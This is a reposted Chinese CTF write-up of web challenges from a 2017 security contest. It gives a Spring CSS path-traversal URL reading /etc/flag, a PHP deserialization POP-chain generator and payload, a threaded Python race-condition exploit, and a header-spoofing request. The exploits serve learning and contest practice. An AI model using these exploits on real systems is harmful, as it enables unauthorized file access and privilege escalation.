2017首届全球华人网络安全技能大赛-web-writeup

栏目: 编程工具 · 发布时间: 7年前

内容简介:2017首届全球华人网络安全技能大赛-web-writeup

springcss

https://github.com/ilmila/springcss-cve-2014-3625

可以这样获取到flag: http://218.2.197.232:18015/spring-css/resources/file:/etc/flag

php序列化

http://wooyun.jozxing.cc/static/drops/tips-3909.html

存储$_SESSION用php_serialize处理器,读取数据用 php 处理器

通过注入 | 字符伪造了对象的序列化数据

<?php
$FLAG = "flag{aaaaaaaa}";
class TOPA {
    public $token;
    public $ticket;
    public $username;
    public $password;
    function __toString() {
        if ($this->username == 'aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb') {
            return 'key is:{' . $this->token . '}' . "\n";
        }
    }
}
class TOPB {
    public $obj;
    public $attr;
    function __construct() {
        $this->attr = null;
        $this->obj = null;
    }
    function __toString() {
        $this->obj = unserialize($this->attr);
        $this->obj->token = $FLAG;
        if ($this->obj->token === $this->obj->ticket) {
            return (string) $this->obj;
        }
    }
}
class TOPC {
    public $obj;
    public $attr;
    function __wakeup() {
        $this->attr = null;
        $this->obj = null;
    }
    function __destruct() {
        echo $this->attr;
    }
}

利用链:C的__destruct在echo的时候,可以调用B的__toString,再通过(string)来调用A类的__toString

这里面牵涉到两个问题,第一个是C中的wakeup,这个可以通过修改属性名的个数绕过,第二个就是 $this->obj->token === $this->obj->ticket

这个可以通过 & 指向同一变量

<?php
$b = new TOPA;
$b->token = Null;
$b->ticket = &$b->token;
$b->username = 'aaaaaaaaaaaaaaaaa';
$b->password = 'bbbbbbbbbbbbbbbbbb';
echo serialize($b) . "\n\n";

$a = new TOPB;
$a->attr = 'O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";s:17:"aaaaaaaaaaaaaaaaa";s:8:"password";s:18:"bbbbbbbbbbbbbbbbbb";}';
$a->obj = '';
// echo serialize($a) . "\n\n";

$c = new TOPC;
$c->attr = $a;
echo serialize($c) . "\n\n";

-------------------------------
最后的payload:
O:4:"TOPC":4:{s:3:"obj";N;s:4:"attr";O:4:"TOPB":2:{s:3:"obj";s:0:"";s:4:"attr";s:127:"O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";s:17:"aaaaaaaaaaaaaaaaa";s:8:"password";s:18:"bbbbbbbbbbbbbbbbbb";}";}}

学到一个新的标识,R

条件竞争

<?php
header("Content-type: text/html; charset=utf-8");
session_start();

$mysqli = new mysqli("localhost", "root", "", "gctf09");
if ($mysqli->connect_errno) {
    die("数据库连接错误,多次出现请联系管理员。");
}

//打印源码
if(isset($_REQUEST['showcode'])){
    highlight_file(___FILE___);
    exit();

}
$user="";
// 初次访问生成用户
if(!isset($_SESSION["name"])){
    $user=substr(md5(uniqid().uniqid()),8,16);
    $_SESSION["name"]=$user;
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`user` (name,pass) VALUES (?,?)");
    $stmt->bind_param("ss",$user,md5($user));
    $stmt->execute();
    $stmt->close();
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`priv` (name,notadmin) VALUES (?,TRUE)");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt->close();
}else{
    $user=$_SESSION["name"];
}
//重置时清理用户信息
if($_SERVER["REQUEST_METHOD"] === "POST" && $_GET['method']==="reset" && isset($_POST['password']) ){
    $stmt = $mysqli->prepare("DELETE FROM gctf09.`user` where name=?");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt = $mysqli->prepare("DELETE FROM gctf09.`priv` where name=?");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`user` (name,pass) VALUES (?,?)");
    $stmt->bind_param("ss",$user,md5($_POST['password']));
    $stmt->execute();
    $stmt->close();
    //判断用户权限时会查询priv表,如果为不为TRUE则是管理员权限
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`priv` (name,notadmin) VALUES (?,TRUE)");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt->close();
    $mysqli->close();
    die("修改成功");
}
$mysqli->close();
?>

python:

#coding=utf8
import requests
from bs4 import BeautifulSoup
import threading

user = ''
def exp():
  global user
  while True:
    s = requests.session()
    r = s.get('http://218.2.197.242:18009/')
    soup = BeautifulSoup(r.content, 'html.parser')
    user = soup.find(id="name")['value']
    print user

    data = {
      'password' : 'helloworld'
    }
    r1 = s.post('http://218.2.197.242:18009/index.php?method=reset',data=data)


def login():
  global user
  while True:
    data = {
      'name' : user,
      'password' : 'helloworld'
    }
    r2 = requests.post('http://218.2.197.242:18009/login.php?method=login',data=data)
    print user,r2.content

def main():
  global user
  threadpool=[]

  for n in xrange(30):
      th = threading.Thread(target=login)
      th.setDaemon(True)
      threadpool.append(th)
  for n in xrange(3):
      th = threading.Thread(target=exp)
      th.setDaemon(True)
      threadpool.append(th)
  for th in threadpool:
      th.start()
  for th in threadpool :
      threading.Thread.join(th)

if __name__ == '__main__':
  main()

web综合

http://218.2.197.232:18007/

有svn,但是只能通过wc.db来得到hash,然后get到源码

工具: https://github.com/anantshri/svn-extractor

Forbidden

GET / HTTP/1.1
Host: www.topsec.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 98;.NET CLR 8)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://www.baidu.com
Accept-Encoding: gzip, deflate, sdch
Accept-Language: de-DE
Cookie: login=4e7a51334d6a63314e6a553d; PHPSESSID=h2cbas2n7mbli0hkll55sc84o7; 186221D9=1; 6EE211F6=1; 
X-Forwarded-For: localhost
x-requested-with: XMLHttpRequest
Connection: close

以上所述就是小编给大家介绍的《2017首届全球华人网络安全技能大赛-web-writeup》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

信息检索导论

信息检索导论

Christopher D.Manning、Hinrich Schütze、Prabhakar Raghavan / 王斌 / 人民邮电出版社 / 201008 / 69.00元

封面图片为英国伯明翰塞尔福瑞吉百货大楼,其极具线条感的轮廓外型优美,犹如水波的流动。其外表悬挂了1.5万个铝碟,创造出一种极具现代气息的纹理装饰效果,有如夜空下水流的波光粼粼,闪烁于月光之下,使建筑的商业氛围表现到极致。设计该建筑的英国“未来系统建筑事物所”,将商场内部围合成一个顶部采光的中庭,配以交叉的自动扶梯,使购物环境呈现出一种凝聚的向心力和商业广告的展示效应。作为英国第二商业城市伯明翰的建......一起来看看 《信息检索导论》 这本书的介绍吧!

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

随机密码生成器
随机密码生成器

多种字符组合密码

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试